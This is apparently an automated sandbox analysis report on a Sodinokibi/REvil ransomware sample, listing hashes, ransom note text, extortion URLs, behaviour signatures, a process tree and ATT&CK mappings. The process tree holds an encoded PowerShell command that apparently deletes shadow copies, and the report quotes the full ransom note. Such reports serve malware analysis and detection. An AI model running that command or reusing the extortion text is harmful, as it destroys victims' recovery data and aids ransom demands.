Analysis

  • max time kernel
    175s
  • max time network
    136s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:18

General

  • Target

    af4796662d4dca855050c42a69c01096573b9acd3faa550ce55560c1dc9ac31c.exe

  • Size

    196KB

  • MD5

    7813228c80b5e0dda5a89927e15013f1

  • SHA1

    8ae0fee7c240effa89f1f4d73a50c6b8ebd9f6b7

  • SHA256

    af4796662d4dca855050c42a69c01096573b9acd3faa550ce55560c1dc9ac31c

  • SHA512

    f3dc4f9a9726ad48fa868cc382d0ab97f1a5840e77deba7469c5a461503fa8d9fcca61c3c77fc21d27aafe44e0b0040f6fa5aa38160a06c785ba0c67933d71a2

Malware Config

Extracted

Path

C:\sd64av-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion sd64av. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C9F7D3D69878FC55 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/C9F7D3D69878FC55 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: k8W4NX2tZrArP2uu3Pty5RwC9VyUeH2FWxyEj0t6DIHZBpo4/IbKXLEr8UfzrbhD iheedaOqng3ztbKohM9D2C5skXxPfYdzO0+nqVYjv43Ro6Aby3HpBcKtMsdyESxX 7GIP6vNFVwUKG9GaDKi0pqk4aNAk9+4l7E78dAST+b/1aeFrDD2m3U6lfeXP6diV hHS1v6/2vhec7NaxCgW//55Bf8wK42hK2YdKBEe5NbIedx+VbWk4hFHaFVDMo9sV ta5OITzJ333eUB0ydg7PqjqAh1rzYwKqJsVYmKsryUIJeLG2LVHqkpaWcif0U5g4 4UVzP03BYOmfquLjX+di1oXQK2bo62+9hEgFcCxxrk6wGaWJVnLatDwMSrW+kebA 2u92PT3zq5cPWtxRGDNSxuwrV0dBDyP7EeQ36XGd0u6ZHUOpjxEXqIcEnnLBekHo 726CbNtlm8z8pSeyFdsqCdOhoHVdG08RyqCHAnqgRmYp6dZX1o982S0+9wjOxw9k j1lAQMBp1wkellQ7WgteHJa71yWBcmINGI4rfDyYBiH9AexW4txi56tQ2E2Cqb6Z 9gWfQH4nXlE83J+4RAX3cFxHZl4fIIVapaCqB8+QZuKOAVNzoy6YH0ga7DkSJbeb dKYooJuAQViybnMLOOHOLG1e6D7gbXr/NX7jPOMaCI/NDRWuCtE171+PxCBUh0rq mYVyBfLxlD2zePFoHmu1exC0HZJzN0YJ1v+R7bhyPpFwUuvziSTC58HoUi578RIV rWCeQTOVcGv9whU14WWywT65AOtlouMpRxjJORFtON3bAQGBmVg1QX+j55Ztpli0 Xa+6wNNR4xWLpQEdaZsKIRY1P9ETBEihb+LyeAx5mdzCENXKTpIS6SWleixkZFh8 aSCe0R3OVBTENRNUtRm7hafxN3yEQIEXsKv6RMunI0frSwT+dCLoTEYLRpEkaHkP kzjOVx4GJbhv1x5TvNtQm8jdqLtOWrqyBA7ah+NJ2z98pXIs/54uYc6uD79JWT4T 7c40HG9WypNinRvl7JVbrtMfWhkrKkl2H3sqLscve3H2Ra5fUfTqi22plrv1ReHG brOlkK0qmGjNaux8J9A4/DpF+a12oF3G/NKAt1EWIkl6EREwbr8I0Q9MxBmECgv7 YFMR5shzDkruv7TRhTYBzZ3ozlBpo5EBiaZHOfG/lDrHV7GpwuYm54Ojg2qLT1W2 YK/j1QUCsiKY6NprHXX3mTqxGEySwe8vNvJGyr2RPI0RgzZJz6IgktBut38WOtF4 OgzjAyI8ZK3oxV+9rR/CYA== Extension name: sd64av ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C9F7D3D69878FC55

http://decryptor.cc/C9F7D3D69878FC55

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 36 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\af4796662d4dca855050c42a69c01096573b9acd3faa550ce55560c1dc9ac31c.exe
    "C:\Users\Admin\AppData\Local\Temp\af4796662d4dca855050c42a69c01096573b9acd3faa550ce55560c1dc9ac31c.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1212
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2144
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1140

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1212-122-0x000001FACCD00000-0x000001FACCD57000-memory.dmp
      Filesize

      348KB

    • memory/1212-124-0x000001FACCD00000-0x000001FACCD57000-memory.dmp
      Filesize

      348KB

    • memory/1212-125-0x000001FAE8BF0000-0x000001FAE8C12000-memory.dmp
      Filesize

      136KB

    • memory/1212-130-0x000001FAE8DA0000-0x000001FAE8E16000-memory.dmp
      Filesize

      472KB